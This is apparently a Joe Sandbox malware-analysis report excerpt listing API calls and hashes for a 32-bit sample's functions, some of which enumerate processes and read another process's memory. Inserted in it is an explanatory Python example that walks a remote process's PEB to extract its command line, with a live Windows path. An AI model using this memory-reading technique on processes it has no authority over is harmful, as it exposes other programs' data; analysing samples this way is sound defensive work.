                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                        • API String ID: 1383202999-2891247106
                                                                        • Opcode ID: b6b7dc0ee5300fde8d0661d82d7d694322362a2f8cf481ff8f4b3aa6c2d32b1f
                                                                        • Instruction ID: 2adf0167732707ddaa7cffab143d0e9031718d00651069aaea29cb710b6c62cc
                                                                        • Opcode Fuzzy Hash: b6b7dc0ee5300fde8d0661d82d7d694322362a2f8cf481ff8f4b3aa6c2d32b1f
                                                                        • Instruction Fuzzy Hash: F2C1527651010EAFDB28EF98C995EFF7FE8EB19300F144599FA06A6291D730DA10DB60
                                                                        APIs
                                                                          • Part of subcall function 00AE6090: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AE60F4
                                                                          • Part of subcall function 00AE6090: GetLastError.KERNEL32 ref: 00AE6190
                                                                        • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00AE6632
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000,?,?,?,?,00000000), ref: 00AE668B
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000,?,?,?,?,?,?,?,00000000), ref: 00AE6712
                                                                        • ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00AE67F6
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00AE686E
                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00AE68C9
                                                                        • FreeLibrary.KERNEL32(?,?,00000000), ref: 00AE691E
                                                                        Strings
                                                                        • NtQueryInformationProcess, xrefs: 00AE662C
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead$ErrorFreeLast$AddressDirectoryLibraryLocalProcSystem
                                                                        • String ID: NtQueryInformationProcess
                                                                        • API String ID: 253270903-2781105232
                                                                        • Opcode ID: 2ed13a2ba8e72b01f111af6c596692c80e660effdb8c035df7905e17e05e9b11
                                                                        • Instruction ID: 2f16ba305067787c5bd60134d7a84184fb407c792ca5c4789488fd899fb033bc
                                                                        • Opcode Fuzzy Hash: 2ed13a2ba8e72b01f111af6c596692c80e660effdb8c035df7905e17e05e9b11
                                                                        • Instruction Fuzzy Hash: 2FB18170D10749DADB20CF65C9487AEBBF0FF58308F204A5DE449A7690DBB566C8CB91
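The entry above resolves NtQueryInformationProcess by name and then issues three ReadProcessMemory calls of 0x1D8 bytes, 0x48 bytes and a variable size. That is the standard sequence for reading another process's command line: query PROCESS_BASIC_INFORMATION for the PEB address, read the PEB, follow PEB.ProcessParameters, and read CommandLine.Buffer. The 0x48-byte read matches the x86 RTL_USER_PROCESS_PARAMETERS layout up to and including the CommandLine UNICODE_STRING at offset 0x40 (the image is 32-bit), though the report itself does not state what the function reads, so that interpretation is an inference from the sizes. The following is an added example, not code from the sample or from Joe Sandbox: the offsets are the public x86 ones, the FakeMemory regions and the command line in them are constructed test data, and the live path only works from 32-bit Python on Windows against a 32-bit target.

```python
"""Walk a remote process's PEB to its command line.

Added example (not code from the sample or from Joe Sandbox). It mirrors the
API sequence GetProcAddress("NtQueryInformationProcess") -> ReadProcessMemory
x3 from the report, using x86 structure offsets because the image is 32-bit.
"""
import struct
import sys

# x86 layout constants (public PEB / RTL_USER_PROCESS_PARAMETERS definitions).
PBI_SIZE = 0x18                  # sizeof(PROCESS_BASIC_INFORMATION) on x86
PBI_PEB_OFFSET = 0x04            # PROCESS_BASIC_INFORMATION.PebBaseAddress
PEB_READ_SIZE = 0x1D8            # first ReadProcessMemory size listed in the report
PEB_PROCESS_PARAMETERS = 0x10    # PEB.ProcessParameters
UPP_READ_SIZE = 0x48             # second ReadProcessMemory size listed in the report
UPP_COMMANDLINE = 0x40           # RTL_USER_PROCESS_PARAMETERS.CommandLine (UNICODE_STRING)


class FakeMemory:
    """Constructed stand-in for ReadProcessMemory: address -> bytes regions."""

    def __init__(self, regions):
        self.regions = regions

    def read(self, addr, size):
        for base, data in self.regions.items():
            if base <= addr < base + len(data):
                off = addr - base
                return data[off:off + size]
        raise OSError(f"unreadable address {addr:#010x}")


def unicode_string(buf, off):
    """Decode an x86 UNICODE_STRING {USHORT Length; USHORT MaximumLength; PWSTR Buffer}."""
    length, _maxlen, ptr = struct.unpack_from("<HHI", buf, off)
    return length, ptr


def remote_command_line(mem, peb_base):
    """PEB -> ProcessParameters -> CommandLine.Buffer, one read per stage."""
    peb = mem.read(peb_base, PEB_READ_SIZE)
    params_ptr = struct.unpack_from("<I", peb, PEB_PROCESS_PARAMETERS)[0]
    params = mem.read(params_ptr, UPP_READ_SIZE)
    length, ptr = unicode_string(params, UPP_COMMANDLINE)
    return mem.read(ptr, length).decode("utf-16-le")


def constructed_target():
    """Fake 32-bit target with the three regions the walk touches (constructed data)."""
    peb_base, params_base, cmd_base = 0x7FFDF000, 0x00390000, 0x00391000
    cmdline = "C:\\example\\target.exe --flag".encode("utf-16-le")
    peb = bytearray(PEB_READ_SIZE)
    struct.pack_into("<I", peb, PEB_PROCESS_PARAMETERS, params_base)
    params = bytearray(UPP_READ_SIZE)
    struct.pack_into("<HHI", params, UPP_COMMANDLINE, len(cmdline), len(cmdline) + 2, cmd_base)
    return FakeMemory({peb_base: bytes(peb), params_base: bytes(params), cmd_base: cmdline}), peb_base


def live_command_line(pid):
    """Same walk against a real process; 32-bit Windows Python only (x86 offsets)."""
    import ctypes
    from ctypes import wintypes
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    ntdll = ctypes.WinDLL("ntdll")
    k32.OpenProcess.restype = wintypes.HANDLE
    k32.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
    k32.ReadProcessMemory.argtypes = [wintypes.HANDLE, wintypes.LPCVOID, wintypes.LPVOID,
                                      ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]
    ntdll.NtQueryInformationProcess.argtypes = [wintypes.HANDLE, ctypes.c_int, wintypes.LPVOID,
                                                wintypes.ULONG, ctypes.POINTER(wintypes.ULONG)]
    # 0x400 (PROCESS_QUERY_INFORMATION) is the access mask in the OpenProcess entry above;
    # reading memory additionally needs PROCESS_VM_READ.
    PROCESS_QUERY_INFORMATION, PROCESS_VM_READ = 0x0400, 0x0010
    h = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
    if not h:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        pbi = ctypes.create_string_buffer(PBI_SIZE)
        ret = wintypes.ULONG()
        status = ntdll.NtQueryInformationProcess(h, 0, pbi, PBI_SIZE, ctypes.byref(ret))
        if status != 0:
            raise OSError(f"NtQueryInformationProcess failed: {status & 0xFFFFFFFF:#010x}")
        peb_base = struct.unpack_from("<I", pbi.raw, PBI_PEB_OFFSET)[0]

        class Live:
            @staticmethod
            def read(addr, size):
                buf = ctypes.create_string_buffer(size)
                n = ctypes.c_size_t()
                if not k32.ReadProcessMemory(h, addr, buf, size, ctypes.byref(n)):
                    raise ctypes.WinError(ctypes.get_last_error())
                return buf.raw[:n.value]

        return remote_command_line(Live, peb_base)
    finally:
        k32.CloseHandle(h)


if __name__ == "__main__":
    mem, peb = constructed_target()
    print(remote_command_line(mem, peb))
    if sys.platform == "win32" and len(sys.argv) > 1:
        print(live_command_line(int(sys.argv[1])))
```

Run it with no arguments to see the walk over the constructed regions; on 32-bit Windows Python, pass a PID to run the same three-stage read against a live process. A 64-bit target would need the x64 offsets (ProcessParameters at 0x20 in the PEB, CommandLine at 0x70 in the parameters block), which is one reason analysts compare the read sizes in a report against the known structure layouts before concluding what a function extracts.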
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AFD498
                                                                        • _Maklocstr.LIBCPMT ref: 00AFD501
                                                                        • _Maklocstr.LIBCPMT ref: 00AFD513
                                                                        • _Maklocchr.LIBCPMT ref: 00AFD52B
                                                                        • _Maklocchr.LIBCPMT ref: 00AFD53B
                                                                        • _Getvals.LIBCPMT ref: 00AFD55D
                                                                          • Part of subcall function 00AF708B: _Maklocchr.LIBCPMT ref: 00AF70BA
                                                                          • Part of subcall function 00AF708B: _Maklocchr.LIBCPMT ref: 00AF70D0
                                                                         Memory Dump Source
                                                                         • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                        • String ID: false$true
                                                                        • API String ID: 3549167292-2658103896
                                                                        • Opcode ID: bdeb71d19974e6b36859af7f3c65bb0999633c5373e9aaff896ce6eb4dd0dea7
                                                                        • Instruction ID: dbecfe29ed4f2a6926b5f0f8a723f6dda8f52086a26a375253dd6c4aae7da915
                                                                        • Opcode Fuzzy Hash: bdeb71d19974e6b36859af7f3c65bb0999633c5373e9aaff896ce6eb4dd0dea7
                                                                        • Instruction Fuzzy Hash: 05215372D04318AADF15EFE4D986EDE7BB8EF05710F008056FA199F192EB709944CBA1
                                                                        APIs
                                                                          • Part of subcall function 00AF5C66: __EH_prolog3.LIBCMT ref: 00AF5C6D
                                                                          • Part of subcall function 00AF5C66: std::_Lockit::_Lockit.LIBCPMT ref: 00AF5C78
                                                                          • Part of subcall function 00AF5C66: std::locale::_Setgloballocale.LIBCPMT ref: 00AF5C93
                                                                          • Part of subcall function 00AF5C66: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF5CE6
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AECA1A
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AECA80
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AECB4F
                                                                          • Part of subcall function 00AF45A7: __EH_prolog3.LIBCMT ref: 00AF45AE
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AECC00
                                                                        • LocalFree.KERNEL32(?,?,?,00B3B6C9,00000000,00B3B6C9), ref: 00AECD01
                                                                        • __cftoe.LIBCMT ref: 00AECE5E
                                                                         Memory Dump Source
                                                                         • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$H_prolog3Locinfo::_Lockit::_Lockit::~_$FreeLocalLocinfo_ctorLocinfo_dtorSetgloballocale__cftoestd::locale::_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 2085124900-1405518554
                                                                        • Opcode ID: 5dfd162c63679ae0d400ad0b7122b1188634074306847355c75a16c625a2df17
                                                                        • Instruction ID: 9fae745c5390280a4c1f061a22778e4f4dd201b6bf66bd9c24fd1c7bc0f03bba
                                                                        • Opcode Fuzzy Hash: 5dfd162c63679ae0d400ad0b7122b1188634074306847355c75a16c625a2df17
                                                                        • Instruction Fuzzy Hash: 67129E71D00289DFDF10DFA9C985BAEBBF5EF18310F144169E815AB381E735AA05CB91
                                                                        APIs
                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00B0B34B
                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 00B0B459
                                                                        • _UnwindNestedFrames.LIBCMT ref: 00B0B5AB
                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00B0B5C6
                                                                         Memory Dump Source
                                                                         • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 2751267872-393685449
                                                                        • Opcode ID: 4e9936d3f7cb6c6fe78c3cb1b57ff31ad91a180fd63b33c5bf875a8e05b9c0eb
                                                                        • Instruction ID: eb4544700b4d42a5d4251e579305622a531f44ef10f3e391179d2fe8960024c6
                                                                        • Opcode Fuzzy Hash: 4e9936d3f7cb6c6fe78c3cb1b57ff31ad91a180fd63b33c5bf875a8e05b9c0eb
                                                                        • Instruction Fuzzy Hash: C1B10671800209EFCF25DFA4C891DAEBBF5FF24310B2485DAE8156B292D731DA51CB91
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00AF0322
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00AF0367
                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00AF03DE
                                                                        • LocalFree.KERNEL32(?), ref: 00AF041B
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,1816BA6E,1816BA6E,?,?), ref: 00AF0546
                                                                         Memory Dump Source
                                                                         • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                         • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                         • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocFree$___std_exception_copy
                                                                        • String ID: ios_base::failbit set$iostream
                                                                        • API String ID: 2276494016-302468714
APIs
• LocalAlloc.KERNEL32(00000040,00000044,1816BA6E,?,00000000), ref: 00AEBA8B
• std::_Lockit::_Lockit.LIBCPMT ref: 00AEBAC8
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AEBB35
• __Getctype.LIBCPMT ref: 00AEBB7E
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AEBBF2
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBCAF
Strings
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 3635123611-1405518554
APIs
• LocalAlloc.KERNEL32(00000040,00000018,1816BA6E,?,00000000,?,?,?,?,?,?,?,00000000,00B2ABC5,000000FF), ref: 00AEC264
• std::_Lockit::_Lockit.LIBCPMT ref: 00AEC29E
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AEC302
• __Getctype.LIBCPMT ref: 00AEC34B
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AEC391
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AEC445
Strings
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 3635123611-1405518554
APIs
• GetCPInfo.KERNEL32(?,?), ref: 00B074C9
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B07557
• __alloca_probe_16.LIBCMT ref: 00B07581
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B075C9
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B075E3
• __alloca_probe_16.LIBCMT ref: 00B07609
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B07646
• CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00B07663
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
• String ID:
• API String ID: 3603178046-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,00AEC6DF,?,00000001,00000000,?,00000000,?,00AEC6DF,?), ref: 00B06F6C
• __alloca_probe_16.LIBCMT ref: 00B06F98
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,00AEC6DF,?,?,00000000,00AECCD3,0000003F,?), ref: 00B06FD7
• LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00AEC6DF,?,?,00000000,00AECCD3,0000003F), ref: 00B06FF4
• LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00AEC6DF,?,?,00000000,00AECCD3,0000003F), ref: 00B07033
• __alloca_probe_16.LIBCMT ref: 00B07050
• LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00AEC6DF,?,?,00000000,00AECCD3,0000003F), ref: 00B07092
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00AEC6DF,?,?,00000000,00AECCD3,0000003F,?), ref: 00B070B5
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: ByteCharMultiStringWide$__alloca_probe_16
• String ID:
• API String ID: 2040435927-0
APIs
• GetTempFileNameW.KERNEL32(?,URL,00000000,?,1816BA6E,?,00000004), ref: 00AE59AA
• LocalFree.KERNEL32(?), ref: 00AE5ABB
• MoveFileW.KERNEL32(?,00000000), ref: 00AE5D5B
• DeleteFileW.KERNEL32(?), ref: 00AE5DA3
Strings
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: File$DeleteFreeLocalMoveNameTemp
• String ID: URL$url
• API String ID: 1622375482-346267919
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AE6242
• CloseHandle.KERNEL32(00000000), ref: 00AE6285
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AE62E1
• OpenProcess.KERNEL32(00000410,00000000,?), ref: 00AE62FD
• CloseHandle.KERNEL32(00000000), ref: 00AE6445
• Process32NextW.KERNEL32(?,0000022C), ref: 00AE6463
• CloseHandle.KERNEL32(00000000), ref: 00AE648E
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
• String ID:
• API String ID: 708755948-0
APIs
• LocalAlloc.KERNEL32(00000040,0000000C,1816BA6E,?,00000000,00000000,?,?,?,?,00000000,00B2B2D1,000000FF,?,00AEEBCA,00000000), ref: 00AEF624
• std::_Lockit::_Lockit.LIBCPMT ref: 00AEF65A
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AEF6BE
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AEF77E
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AEF832
Strings
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2968629171-1405518554
APIs
• LocalAlloc.KERNEL32(00000040,00000008,1816BA6E,?,00000000,00000000,?,?,?,00000000,00B2B1DD,000000FF,?,00AEED0A,00000000,?), ref: 00AEF3F4
• std::_Lockit::_Lockit.LIBCPMT ref: 00AEF42A
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AEF48E
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AEF4FE
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AEF5B2
Strings
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2968629171-1405518554
APIs
• _ValidateLocalCookies.LIBCMT ref: 00B08D67
• ___except_validate_context_record.LIBVCRUNTIME ref: 00B08D6F
• _ValidateLocalCookies.LIBCMT ref: 00B08DF8
• __IsNonwritableInCurrentImage.LIBCMT ref: 00B08E23
• _ValidateLocalCookies.LIBCMT ref: 00B08E78
Strings
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
APIs
• FreeLibrary.KERNEL32(00000000,?,00B1CA78,?,?,?,00000000,?,?,00B1CCA2,00000021,FlsSetValue,00B31E00,00B31E08,?), ref: 00B1CA2C
Strings
Memory Dump Source
• Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
                                                                        • Opcode ID: f15fb2c156dd9d0251f297703513783f373314491c983d2a7c67f4e305a989aa
                                                                        • Instruction ID: e2469cca90603052182e6de869495f07dfaf72f23745f8005548fb25cb589f35
                                                                        • Opcode Fuzzy Hash: f15fb2c156dd9d0251f297703513783f373314491c983d2a7c67f4e305a989aa
                                                                        • Instruction Fuzzy Hash: 2C21EE31641215E7C732D7649C44BEB3BE8DF417E4FA50190E905F7195EA30ED41C6E0

APIs
• __EH_prolog3.LIBCMT ref: 00AFD8FD
• ctype.LIBCPMT ref: 00AFD944
  • Part of subcall function 00AFD458: __Getctype.LIBCPMT ref: 00AFD467
  • Part of subcall function 00AF79C9: __EH_prolog3.LIBCMT ref: 00AF79D0
  • Part of subcall function 00AF79C9: std::_Lockit::_Lockit.LIBCPMT ref: 00AF79DA
  • Part of subcall function 00AF79C9: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7A4B
